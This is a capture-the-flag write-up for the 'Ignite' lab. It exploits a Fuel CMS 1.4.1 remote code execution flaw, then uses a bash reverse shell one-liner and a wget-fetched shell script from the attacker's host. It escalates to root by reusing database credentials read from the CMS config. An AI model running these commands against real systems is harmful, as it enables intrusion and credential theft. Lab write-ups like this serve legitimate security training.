Ignite

Intro

Room Info

🔗 Name

Ignite

🎯 Target IP

10.10.174.21

📈 Difficulty level

🟢Easy

💲 Subscription type

Free

🐧 OS

Linux

Recon

mkdir ignite
cd ignite
nmap -sV -sC -oA nmap_ignite 10.10.174.21

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry
|_/fuel/

📌 Found FUEL CMS v. 1.4 on port 80

Local Recon

Navigate to

http://10.10.174.21/
http://10.10.174.21/fuel
- admin:admin

Exploitation

Search for a Fuel CMS exploit

searchsploit fuel cms
searchsploit -m 50477
less 50477.py

python 50477.py -u http://10.10.174.21

📌 Fuel CMS 1.4.1 - Remote Code Execution (3)

whoami

Reverse Shell

ip -br -c a
	10.18.65.48 # my IP
	
subl shell.sh

# Insert this line for a bash reverse shell
/bin/bash -i >& /dev/tcp/10.18.65.48/3333 0>&1

Setup a Python web server and a nc listener on 2 different tabs

python -m http.server

nc -nvlp 3333

Back in the exploited Fuel CMS Enter Command $

wget http://10.18.65.48:8000/shell.sh -O shell.sh
bash shell.sh

🚩 Reverse shell received in the nc terminal

/usr/bin/script -qc /bin/bash /dev/null
cd /home/www-data
ls
cat flag.txt
6470e***************************

Privilege Escalation

Enumerate Fuel CMS application
- /var/www/html/fuel/application/config/

cat /var/www/html/fuel/application/config/database.php

$db['default'] = array(
	'dsn'	=> '',
	'hostname' => 'localhost',
	'username' => 'root',
	'password' => 'mememe',
	'database' => 'fuel_schema',
	'dbdriver' => 'mysqli',
	'dbprefix' => '',
	'pconnect' => FALSE,
	'db_debug' => (ENVIRONMENT !== 'production'),
	'cache_on' => FALSE,
	'cachedir' => '',
	'char_set' => 'utf8',
	'dbcollat' => 'utf8_general_ci',
	'swap_pre' => '',
	'encrypt' => FALSE,
	'compress' => FALSE,
	'stricton' => FALSE,
	'failover' => array(),
	'save_queries' => TRUE
);

📌 Found database credentials: root:mememe

Try to use those credentials for the root user of the system

su root

whoami
cd
cat root.txt
b9bbc**************************

PreviousIce NextRetro

Last updated 6 months ago

Was this helpful?